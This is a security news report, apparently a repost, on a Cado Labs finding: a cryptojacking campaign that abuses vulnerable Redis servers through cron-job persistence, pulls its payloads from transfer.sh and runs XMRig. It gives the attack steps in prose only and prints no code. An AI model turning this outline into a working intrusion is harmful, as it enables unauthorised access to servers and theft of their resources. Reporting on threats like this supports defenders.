Cado Labs’ security experts recently discovered a new crypto jacking operation that specifically targets vulnerable Redis deployments. The campaign employs an open-source, freely available command-line file transfer service called transfer[.]sh as its key element. Although the service has been in operation for several years, instances of its use for malware dissemination are infrequent.
However, Cado Labs’ telemetry data shows a shift in the trend, with an increase in service utilization noticed since the beginning of 2023. The reasons behind this trend are unclear, but it’s possible that this move aims to evade detection techniques that rely on identifying typical code hosting domains, including pastebin.com.
Cado Labs analyzed several malware campaigns targeting cloud-based systems and found that shell scripts are widely used in these attacks, particularly in cryptojacking campaigns. It appears that attackers rely heavily on popular data transfer utilities on Linux to retrieve payloads. As a result, Transfer[.]sh may become a feasible alternative to platforms like Pastebin in the long run.
Initial Access
The attackers exploited a vulnerable Redis deployment to gain initial access for their campaign. They accomplished this by creating a cron job and storing it in the data store. This caused Redis to save the database file directly to a subdirectory that is used for running cron jobs. When the cron scheduler reads and parses files in this directory, it can result in arbitrary command execution if the database file is involved as a cron job.
It is worth noting that similar attack techniques have been used by other cybercriminal groups, including TeamTNT and WatchDog, to mine cryptocurrencies via cryptojacking.
Technical Analysis
On the victim’s compromised system, the primary goal of the malware is to mine cryptocurrency, so the script initiates a series of preliminary procedures to guarantee optimal utilization of the hardware.
Furthermore, the script employs the Linux “sync” command to coerce the kernel into writing the data currently residing in memory buffers to disk.
The malicious payload comprises a script that serves as a precursor to an XMRig cryptocurrency mining program. However, before launching the mining operation, the script executes several preliminary actions, including:
- Freeing up memory
- Shutting down rival mining programs
- Installing a network scanning tool known as pnscan
The subsequent step involves generating a distinct XMRig configuration, which is then saved to the disk. This customized configuration allows the miner to connect with various cryptocurrency mining miners.
Over the past few months, Redis servers have been targeted by cyber threats like Redigo and HeadCrab, and the list of such attacks continues to expand with this latest development.
For a significant period, malware developers have been utilizing free file or code hosting services to host additional payloads. This approach provides cybercriminals with increased anonymity and flexibility in their illicit activities.
The primary objective of this malware campaign is clearly to hijack computing resources for cryptocurrency mining. However, it should be noted that an unintended consequence may arise if a system becomes infected with this malware.
Go to Source
Author: Balaji N